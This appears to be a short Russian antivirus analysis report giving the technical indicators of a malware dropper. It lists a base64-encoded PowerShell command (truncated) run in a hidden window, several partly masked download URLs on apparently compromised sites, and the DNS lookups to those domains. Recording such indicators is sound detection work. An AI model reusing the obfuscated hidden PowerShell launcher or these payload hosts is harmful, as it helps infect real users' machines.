Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAaQByADIAMgB3AD0AKAAnAEcAMgA0AGUANgBoACcAKwAnADUAJwApADsAJgAoACcAbgBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBOAFYAOgB0AEUAbQBwAFwATwBGAGYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...
- http://id###isoft.pt/istore/uyg0iy068972/
- http://www.id###isoft.pt/istore/uyg0iy068972/
- http://di####lumesh.tech/cgi-bin/mUl/
- http://ci###ehoje.pt/wp-includes/mDobpkdtbyht707/
- http://www.xi##isk.com/w48o/TZJS/
- DNS ASK id###isoft.pt
- DNS ASK di####lumesh.tech
- DNS ASK ci###ehoje.pt
- DNS ASK co####enceroom.ge
- DNS ASK xi##isk.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABUADUAaQByADIAMgB3AD0AKAAnAEcAMgA0AGUANgBoACcAKwAnADUAJwApADsAJgAoACcAbgBlAHcALQBpAHQAZQAnACsAJwBtACcAKQAgACQARQBOAFYAOgB0AEUAbQBwAFwATwBGAGYAaQBDAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AHkAcABlAC...' (со скрытым окном)